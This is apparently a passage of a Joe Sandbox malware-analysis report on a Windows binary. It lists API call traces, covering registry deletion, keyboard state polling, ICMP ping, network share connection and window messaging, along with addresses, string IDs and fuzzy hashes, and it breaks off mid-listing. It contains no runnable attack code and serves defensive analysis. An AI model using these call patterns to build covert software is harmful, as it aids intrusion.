                                                  • Part of subcall function 0059CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0059CD28
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 0059CCF3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                • API String ID: 2734957052-4033151799
                                                • Opcode ID: a64dd6b452da4cc87a53810dfd57076986f40d08d64c7ba6537ffcaba2ffda7f
                                                • Instruction ID: 76449b2b1065bb2c4135b0473957e9dec6189acc7770e4949f094441577c5f4f
                                                • Opcode Fuzzy Hash: a64dd6b452da4cc87a53810dfd57076986f40d08d64c7ba6537ffcaba2ffda7f
                                                • Instruction Fuzzy Hash: 94316E71A41229BBDB208B54DC88EFFBFBCFF56750F000165E905E6240DB349E49EAA0
                                                APIs
                                                • timeGetTime.WINMM ref: 0057E6B4
                                                  • Part of subcall function 0052E551: timeGetTime.WINMM(?,?,0057E6D4), ref: 0052E555
                                                • Sleep.KERNEL32(0000000A), ref: 0057E6E1
                                                • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0057E705
                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0057E727
                                                • SetActiveWindow.USER32 ref: 0057E746
                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0057E754
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0057E773
                                                • Sleep.KERNEL32(000000FA), ref: 0057E77E
                                                • IsWindow.USER32 ref: 0057E78A
                                                • EndDialog.USER32(00000000), ref: 0057E79B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                • String ID: BUTTON
                                                • API String ID: 1194449130-3405671355
                                                • Opcode ID: a494808b6dc206de66f1f48140752f687c2c423c56e22be94da2a861d6eeeb14
                                                • Instruction ID: f073b9751afbd4aa994e19799cc77203efcd0e95fc8a64b490d8719a6423eb07
                                                • Opcode Fuzzy Hash: a494808b6dc206de66f1f48140752f687c2c423c56e22be94da2a861d6eeeb14
                                                • Instruction Fuzzy Hash: 4B2162B0200385AFEF045F25FCCAA253F6DF77A349F108465F549861A5DFB1AC08BA24
                                                APIs
                                                  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0057EA5D
                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0057EA73
                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057EA84
                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0057EA96
                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0057EAA7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: SendString$_wcslen
                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                • API String ID: 2420728520-1007645807
                                                • Opcode ID: 61a8cefd10ec93d11d4f7b626158cb2532e02c0f54a0e6227855c869ed93631e
                                                • Instruction ID: b23c9614e526a7b91241434ed60e74c863b90059a5dfcc7ebf550558c172c401
                                                • Opcode Fuzzy Hash: 61a8cefd10ec93d11d4f7b626158cb2532e02c0f54a0e6227855c869ed93631e
                                                • Instruction Fuzzy Hash: C2115131A5021A79E720A7A5DC5FDFF6F7CFBD5B40F00082BB811A21D1EA701946D9B1
                                                APIs
                                                  • Part of subcall function 00528F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00528BE8,?,00000000,?,?,?,?,00528BBA,00000000,?), ref: 00528FC5
                                                • DestroyWindow.USER32(?), ref: 00528C81
                                                • KillTimer.USER32(00000000,?,?,?,?,00528BBA,00000000,?), ref: 00528D1B
                                                • DestroyAcceleratorTable.USER32(00000000), ref: 00566973
                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00528BBA,00000000,?), ref: 005669A1
                                                • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00528BBA,00000000,?), ref: 005669B8
                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00528BBA,00000000), ref: 005669D4
                                                • DeleteObject.GDI32(00000000), ref: 005669E6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                • String ID:
                                                • API String ID: 641708696-0
                                                • Opcode ID: f24463815d56d80adb4a558604b0bac160634a9bf37ff793da9c8934840065d8
                                                • Instruction ID: 30d0a4b81ba2f000b36e6c4fb785cd3ddd457784389474be67a17238baca1d2b
                                                • Opcode Fuzzy Hash: f24463815d56d80adb4a558604b0bac160634a9bf37ff793da9c8934840065d8
                                                • Instruction Fuzzy Hash: 45618031502B61DFDB259F54EA487397FF1FF62312F144918E082AB5A0CB35AC98EB54
                                                APIs
                                                  • Part of subcall function 00529944: GetWindowLongW.USER32(?,000000EB), ref: 00529952
                                                • GetSysColor.USER32(0000000F), ref: 00529862
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ColorLongWindow
                                                • String ID:
                                                • API String ID: 259745315-0
                                                • Opcode ID: d9ff70b674d20776c70e0103e6a8df3a9f10bd990e5cc0271dfdb4b142fa2434
                                                • Instruction ID: 4cb9e7f3d078a931fe476a7b2be02545f5e048aca7da1330e3f638e743243659
                                                • Opcode Fuzzy Hash: d9ff70b674d20776c70e0103e6a8df3a9f10bd990e5cc0271dfdb4b142fa2434
                                                • Instruction Fuzzy Hash: DD41AF31504654AFDB245F38AC88BB93FA5BF27330F184655F9A28B2E2D7319846EB10
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0055F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00579717
                                                • LoadStringW.USER32(00000000,?,0055F7F8,00000001), ref: 00579720
                                                  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0055F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00579742
                                                • LoadStringW.USER32(00000000,?,0055F7F8,00000001), ref: 00579745
                                                • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00579866
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message_wcslen
                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                • API String ID: 747408836-2268648507
                                                • Opcode ID: af6b7b827216762ec88a924427d34ffe46f42bc3cdc9ffdd9ec789559f132d71
                                                • Instruction ID: 80cc43e4dae3be0c9425749b8b5899d28683a7dc2cdb02409d0af7afc2769872
                                                • Opcode Fuzzy Hash: af6b7b827216762ec88a924427d34ffe46f42bc3cdc9ffdd9ec789559f132d71
                                                • Instruction Fuzzy Hash: 7541207280021AAADF14EBE0DD9ADEE7B78BF95340F104425F60572092EB356F89DB71
                                                APIs
                                                  • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005707A2
                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005707BE
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005707DA
                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00570804
                                                • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0057082C
                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00570837
                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0057083C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                • API String ID: 323675364-22481851
                                                • Opcode ID: c301f0c6cb9751d543b5ef0558e464e761b8ca576a4731dfaf54e9aebf7531cc
                                                • Instruction ID: 24b33ed58f2f657a203f1727a9fedcb3e013658d3200f73d438afd1070e70d02
                                                • Opcode Fuzzy Hash: c301f0c6cb9751d543b5ef0558e464e761b8ca576a4731dfaf54e9aebf7531cc
                                                • Instruction Fuzzy Hash: F9411A71C10229EBDF15EFA4DC998EDBBB8FF54350F144526E905A31A1EB30AE44DB90
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 00587AF3
                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00587B8F
                                                • SHGetDesktopFolder.SHELL32(?), ref: 00587BA3
                                                • CoCreateInstance.OLE32(005AFD08,00000000,00000001,005D6E6C,?), ref: 00587BEF
                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00587C74
                                                • CoTaskMemFree.OLE32(?,?), ref: 00587CCC
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00587D57
                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00587D7A
                                                • CoTaskMemFree.OLE32(00000000), ref: 00587D81
                                                • CoTaskMemFree.OLE32(00000000), ref: 00587DD6
                                                • CoUninitialize.OLE32 ref: 00587DDC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                • String ID:
                                                • API String ID: 2762341140-0
                                                • Opcode ID: e45ef0b7c5dd411f83bba81f8acaa719ae31d89cd8e3f126ffc69ec6d968d194
                                                • Instruction ID: e0eb0b44b998ba408dac48f68a003ae90e1cc16954d485a252e6de2c1b545eeb
                                                • Opcode Fuzzy Hash: e45ef0b7c5dd411f83bba81f8acaa719ae31d89cd8e3f126ffc69ec6d968d194
                                                • Instruction Fuzzy Hash: 1DC10B75A04109AFDB14DFA4C888DAEBFF9FF48304B148499E819AB361D731EE45CB90
                                                APIs
                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 005A5504
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005A5515
                                                • CharNextW.USER32(00000158), ref: 005A5544
                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 005A5585
                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 005A559B
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005A55AC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend$CharNext
                                                • String ID:
                                                • API String ID: 1350042424-0
                                                • Opcode ID: d5886003ec15155a33efa9b38eafa08cfe157a35db590d3bee6c0fb55c518d32
                                                • Instruction ID: ea8e2b4be976ada3c33e14a844faf45e9a5f019e2946aaab4e145fcb64cc028e
                                                • Opcode Fuzzy Hash: d5886003ec15155a33efa9b38eafa08cfe157a35db590d3bee6c0fb55c518d32
                                                • Instruction Fuzzy Hash: D7615931904609EFDF119F64CC84EBE7FB9FB1A720F104545FA25AB290E7748A84DB60
                                                APIs
                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0056FAAF
                                                • SafeArrayAllocData.OLEAUT32(?), ref: 0056FB08
                                                • VariantInit.OLEAUT32(?), ref: 0056FB1A
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 0056FB3A
                                                • VariantCopy.OLEAUT32(?,?), ref: 0056FB8D
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 0056FBA1
                                                • VariantClear.OLEAUT32(?), ref: 0056FBB6
                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 0056FBC3
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0056FBCC
                                                • VariantClear.OLEAUT32(?), ref: 0056FBDE
                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0056FBE9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                • String ID:
                                                • API String ID: 2706829360-0
                                                • Opcode ID: 9356f6dfa460259c161621eaeb9fb15b02d14413d0e097da0380477a65ed9a83
                                                • Instruction ID: 052c8d2941b85b41d45c82aff44a66275088f8fcaffea0f8c130a4442233d49e
                                                • Opcode Fuzzy Hash: 9356f6dfa460259c161621eaeb9fb15b02d14413d0e097da0380477a65ed9a83
                                                • Instruction Fuzzy Hash: B4415F35E002199FCF00DFA4D8589AEBFB9FF59345F008069E906A7261DB70A945DBA0
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 00579CA1
                                                • GetAsyncKeyState.USER32(000000A0), ref: 00579D22
                                                • GetKeyState.USER32(000000A0), ref: 00579D3D
                                                • GetAsyncKeyState.USER32(000000A1), ref: 00579D57
                                                • GetKeyState.USER32(000000A1), ref: 00579D6C
                                                • GetAsyncKeyState.USER32(00000011), ref: 00579D84
                                                • GetKeyState.USER32(00000011), ref: 00579D96
                                                • GetAsyncKeyState.USER32(00000012), ref: 00579DAE
                                                • GetKeyState.USER32(00000012), ref: 00579DC0
                                                • GetAsyncKeyState.USER32(0000005B), ref: 00579DD8
                                                • GetKeyState.USER32(0000005B), ref: 00579DEA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: 8f6b53878ed8cd5fe1f2804be95c920d8f962817de2d43954889e4c7bc82ad7e
                                                • Instruction ID: 685d34758f6ca7475cc448b13190a1fd413ce8ef14e5e60e09656be6af4b914b
                                                • Opcode Fuzzy Hash: 8f6b53878ed8cd5fe1f2804be95c920d8f962817de2d43954889e4c7bc82ad7e
                                                • Instruction Fuzzy Hash: 1941EB345047C96DFF318764A4043B5BEA47F22344F08C05ADACA575C2EBA49DC8E7B2
                                                APIs
                                                • WSAStartup.WSOCK32(00000101,?), ref: 005905BC
                                                • inet_addr.WSOCK32(?), ref: 0059061C
                                                • gethostbyname.WSOCK32(?), ref: 00590628
                                                • IcmpCreateFile.IPHLPAPI ref: 00590636
                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 005906C6
                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 005906E5
                                                • IcmpCloseHandle.IPHLPAPI(?), ref: 005907B9
                                                • WSACleanup.WSOCK32 ref: 005907BF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                • String ID: Ping
                                                • API String ID: 1028309954-2246546115
                                                • Opcode ID: 3c550eb622e610f3e54d186f478d3057c34925964454a903109b43cfc1d3b368
                                                • Instruction ID: 9f814ae3ae2f078b379af0feebdecb90875333d50973ea182e424a9ce42a4572
                                                • Opcode Fuzzy Hash: 3c550eb622e610f3e54d186f478d3057c34925964454a903109b43cfc1d3b368
                                                • Instruction Fuzzy Hash: F5916C356042019FDB20DF15D488B1ABFE4FF85328F1599A9E4698B6A2C730FD85CF91
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _wcslen$BuffCharLower
                                                • String ID: cdecl$none$stdcall$winapi
                                                • API String ID: 707087890-567219261
                                                • Opcode ID: 9bf8d05e32af8baac46059f62ffa2f4972ba75bb22e3154c9535cd29a3a4b901
                                                • Instruction ID: a53a5601b67f748e7e8b52716f4967f956f04f3a7f262ffda55c86cccd0f5692
                                                • Opcode Fuzzy Hash: 9bf8d05e32af8baac46059f62ffa2f4972ba75bb22e3154c9535cd29a3a4b901
                                                • Instruction Fuzzy Hash: AC519431A001179BCF24DF6CC9509BEBBA5BF66720B244629E426E73C4DB35DD40C790
                                                APIs
                                                • CoInitialize.OLE32 ref: 00593774
                                                • CoUninitialize.OLE32 ref: 0059377F
                                                • CoCreateInstance.OLE32(?,00000000,00000017,005AFB78,?), ref: 005937D9
                                                • IIDFromString.OLE32(?,?), ref: 0059384C
                                                • VariantInit.OLEAUT32(?), ref: 005938E4
                                                • VariantClear.OLEAUT32(?), ref: 00593936
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                • API String ID: 636576611-1287834457
                                                • Opcode ID: c55db850f75ac87a2f66fc61aae2700cba9ce81ecf80317b74ef240c099ae4d2
                                                • Instruction ID: 21e47184bd8155c0ce31768e3ffbbb48a829bf99ac12fd1f2fd0b081e013da92
                                                • Opcode Fuzzy Hash: c55db850f75ac87a2f66fc61aae2700cba9ce81ecf80317b74ef240c099ae4d2
                                                • Instruction Fuzzy Hash: EB617971608202EFDB10DF54D889B6ABFE8FF89710F004819F9859B291D770EE49CB92
                                                APIs
                                                  • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                  • Part of subcall function 0052912D: GetCursorPos.USER32(?), ref: 00529141
                                                  • Part of subcall function 0052912D: ScreenToClient.USER32(00000000,?), ref: 0052915E
                                                  • Part of subcall function 0052912D: GetAsyncKeyState.USER32(00000001), ref: 00529183
                                                  • Part of subcall function 0052912D: GetAsyncKeyState.USER32(00000002), ref: 0052919D
                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 005A8B6B
                                                • ImageList_EndDrag.COMCTL32 ref: 005A8B71
                                                • ReleaseCapture.USER32 ref: 005A8B77
                                                • SetWindowTextW.USER32(?,00000000), ref: 005A8C12
                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 005A8C25
                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 005A8CFF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
